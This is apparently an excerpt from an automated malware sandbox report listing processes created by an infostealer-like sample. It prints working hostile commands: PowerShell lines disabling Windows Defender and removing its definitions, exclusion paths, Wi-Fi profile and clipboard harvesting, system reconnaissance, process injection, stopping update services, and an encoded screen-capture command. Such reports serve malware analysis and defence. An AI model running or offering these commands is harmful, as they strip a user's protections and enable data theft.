                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\setup.exeThread register set: target process: 7368
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: 66DD711010
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaac